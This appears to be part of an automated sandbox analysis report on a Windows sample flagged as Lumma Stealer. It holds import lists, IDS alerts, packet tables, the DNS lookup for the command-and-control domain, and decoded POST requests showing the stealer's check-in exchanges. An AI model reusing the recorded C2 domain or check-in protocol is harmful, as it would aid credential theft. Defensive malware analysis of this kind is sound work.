                                                                                KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwindEx, RtlVirtualUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualProtect, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-30T15:55:16.951297+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149756172.67.148.118443TCP
                                                                                2024-12-30T15:55:29.028116+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1149756172.67.148.118443TCP
                                                                                2024-12-30T15:55:29.028116+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149756172.67.148.118443TCP
                                                                                2024-12-30T15:55:29.522357+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149837172.67.148.118443TCP
                                                                                2024-12-30T15:55:30.029059+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1149837172.67.148.118443TCP
                                                                                2024-12-30T15:55:30.029059+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149837172.67.148.118443TCP
                                                                                2024-12-30T15:55:31.034523+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149845172.67.148.118443TCP
                                                                                2024-12-30T15:55:32.407597+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149858172.67.148.118443TCP
                                                                                2024-12-30T15:55:32.941576+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1149858172.67.148.118443TCP
                                                                                2024-12-30T15:55:33.807369+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149869172.67.148.118443TCP
                                                                                2024-12-30T15:55:36.886737+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1164243172.67.148.118443TCP
                                                                                2024-12-30T15:55:38.672375+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1164254172.67.148.118443TCP
                                                                                2024-12-30T15:55:41.123431+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1164270172.67.148.118443TCP
                                                                                2024-12-30T15:55:41.627242+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1164270172.67.148.118443TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 30, 2024 15:55:16.475481033 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:16.475541115 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:16.475661993 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:16.483268023 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:16.483306885 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:16.951209068 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:16.951297045 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:17.062865973 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:17.062897921 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:17.063297987 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:17.109038115 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:17.407938957 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:17.408190966 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:17.408221006 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.027844906 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.027937889 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.027995110 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.030339956 CET49756443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.030360937 CET44349756172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.044615984 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.044644117 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.044760942 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.046056986 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.046066046 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.522205114 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.522356987 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.563458920 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.563477993 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.563821077 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:29.565824032 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.565933943 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:29.565960884 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.028939009 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029055119 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029105902 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029114008 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.029133081 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029164076 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029181004 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.029194117 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029203892 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029243946 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.029279947 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029324055 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.029334068 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029381037 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.029432058 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.029439926 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.077814102 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.119021893 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.119086981 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.119111061 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.119215012 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.119322062 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.119322062 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.119558096 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.119576931 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.119590044 CET49837443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.119596004 CET44349837172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.522305012 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.522342920 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:30.522418976 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.523144960 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:30.523159981 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.034384966 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.034523010 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.036494017 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.036503077 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.036794901 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.044831038 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.045110941 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.045145988 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.785157919 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.785279036 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.785481930 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.785528898 CET49845443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.785535097 CET44349845172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.945028067 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.945041895 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:31.945398092 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.945890903 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:31.945903063 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:32.407510996 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:32.407597065 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:32.410361052 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:32.410375118 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:32.411102057 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:32.422070980 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:32.422363997 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:32.422396898 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:32.422457933 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:32.467334986 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:32.941571951 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:32.941694975 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:32.941782951 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.023469925 CET49858443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.023490906 CET44349858172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.342485905 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.342525005 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.342621088 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.343200922 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.343214989 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.807291031 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.807368994 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.808921099 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.808928013 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.809170961 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.810852051 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.811062098 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.811091900 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:33.811176062 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:33.811183929 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:34.308660030 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:34.308765888 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:34.308830023 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:34.309237957 CET49869443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:34.309252024 CET44349869172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.420447111 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.420490026 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.420563936 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.421112061 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.421125889 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.886641026 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.886737108 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.889751911 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.889758110 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.890014887 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:36.892384052 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.892476082 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:36.892481089 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:37.777085066 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:37.777184963 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:37.777364969 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:37.777492046 CET64243443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:37.777509928 CET44364243172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.210916042 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.210944891 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.211343050 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.211477041 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.211484909 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.672283888 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.672374964 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.715472937 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.715500116 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.715820074 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.717150927 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.718220949 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.718251944 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.718396902 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.718425989 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.718679905 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.718719006 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.718971968 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719002008 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719141960 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719168901 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719356060 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719409943 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719446898 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719451904 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719609022 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719636917 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.719660997 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719845057 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.719866991 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.727360010 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.728905916 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.728977919 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:38.729021072 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.729078054 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:38.729594946 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.637547016 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.637630939 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.637881994 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.638164997 CET64254443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.638181925 CET44364254172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.651074886 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.651113033 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:40.651381969 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.651762009 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:40.651772976 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.123191118 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.123430967 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.124603033 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.124612093 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.124880075 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.126406908 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.126426935 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.126493931 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.627238989 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.627338886 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.627392054 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.628068924 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.628084898 CET44364270172.67.148.118192.168.2.11
                                                                                Dec 30, 2024 15:55:41.628101110 CET64270443192.168.2.11172.67.148.118
                                                                                Dec 30, 2024 15:55:41.628107071 CET44364270172.67.148.118192.168.2.11

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 30, 2024 15:55:16.442837000 CET5784753192.168.2.111.1.1.1
                                                                                Dec 30, 2024 15:55:16.464736938 CET53578471.1.1.1192.168.2.11
                                                                                Dec 30, 2024 15:55:33.819305897 CET53561601.1.1.1192.168.2.11

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 30, 2024 15:55:16.442837000 CET192.168.2.111.1.1.10xa5bfStandard query (0)marbleshinys.clickA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 30, 2024 15:55:16.464736938 CET1.1.1.1192.168.2.110xa5bfNo error (0)marbleshinys.click172.67.148.118A (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 15:55:16.464736938 CET1.1.1.1192.168.2.110xa5bfNo error (0)marbleshinys.click104.21.47.149A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • marbleshinys.click

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.1149756172.67.148.1184438016C:\Windows\SysWOW64\dxdiag.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 14:55:17 UTC265OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 8
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                Data Ascii: act=life
                                                                                2024-12-30 14:55:29 UTC1129INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=be0hdlkoo4lnn0n7ea1nv2fl4o; expires=Fri, 25 Apr 2025 08:42:07 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KTdGUfh%2FxbYPuy1p5cdil%2BRGxscEzwZU7e8R6Q3to1n8wNGdslmecQu4zEKySywgBJHYT%2BPCohrFnnFgvC14TVomlx89d5kDin9KEo5ttfcfqii7opv1bNvU0fDXqtLT7h6y6o0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2deb62a5a7ced-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1836&rtt_var=713&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1509824&cwnd=179&unsent_bytes=0&cid=81f461816bdbfa75&ts=12081&x=0"
                                                                                2024-12-30 14:55:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                Data Ascii: 2ok
                                                                                2024-12-30 14:55:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.1149837172.67.148.1184438016C:\Windows\SysWOW64\dxdiag.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 14:55:29 UTC266OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 45
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:29 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d
                                                                                Data Ascii: act=recive_message&ver=4.0&lid=ZqchOa--new&j=
                                                                                2024-12-30 14:55:30 UTC1131INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:29 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=573cbd56oqhem4s53nt8jiariv; expires=Fri, 25 Apr 2025 08:42:08 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpBJe0klMcJG6RUzs6kilOWzdmXxxamIiXPTUxLsuuOsZADYQp1VxSTuJ6PXw%2F8Fnjo2sx23yCmE%2FmPsRY%2FeFAN%2FTjlU9P4%2F7DALHIwI6WO4WnocvltRwJAUpi3ioEC7UBwDohY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df021bb6c45e-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1719&rtt_var=647&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=947&delivery_rate=1698662&cwnd=243&unsent_bytes=0&cid=f7db7e0fb0b68896&ts=502&x=0"
                                                                                2024-12-30 14:55:30 UTC238INData Raw: 34 36 32 0d 0a 4e 71 30 69 4f 47 71 4a 72 73 64 43 63 61 37 2f 6f 4c 32 71 4a 6a 65 7a 48 63 59 5a 6e 55 36 6d 54 75 70 4f 62 36 54 6c 2b 74 74 4e 6a 31 51 61 55 4c 32 43 35 54 45 55 6a 4d 58 55 7a 39 39 44 47 35 46 38 6f 6a 75 6e 4b 4d 63 69 6d 53 74 44 68 70 4f 58 2b 51 7a 4c 51 31 51 5a 37 49 4c 6c 4a 77 6d 4d 78 66 76 47 69 45 4e 5a 6b 53 66 6b 66 50 63 73 78 79 4b 49 4c 77 54 4c 6c 5a 61 34 58 73 46 46 55 41 2f 71 79 71 59 75 48 4d 75 61 78 64 7a 41 53 46 37 65 64 61 73 37 73 57 7a 44 4e 4d 68 30 54 65 6d 41 6a 72 70 37 7a 46 46 54 53 50 53 43 76 47 41 55 77 4e 32 61 6e 38 74 44 56 64 39 37 6f 6e 4c 31 4a 73 34 71 69 53 6f 46 31 49 79 63 73 31 37 50 52 6c 45 46 34 39 36 72 4a 42 76 41 6e 4d 2f 63 69
                                                                                Data Ascii: 462Nq0iOGqJrsdCca7/oL2qJjezHcYZnU6mTupOb6Tl+ttNj1QaUL2C5TEUjMXUz99DG5F8ojunKMcimStDhpOX+QzLQ1QZ7ILlJwmMxfvGiENZkSfkfPcsxyKILwTLlZa4XsFFUA/qyqYuHMuaxdzASF7edas7sWzDNMh0TemAjrp7zFFTSPSCvGAUwN2an8tDVd97onL1Js4qiSoF1Iycs17PRlEF496rJBvAnM/ci
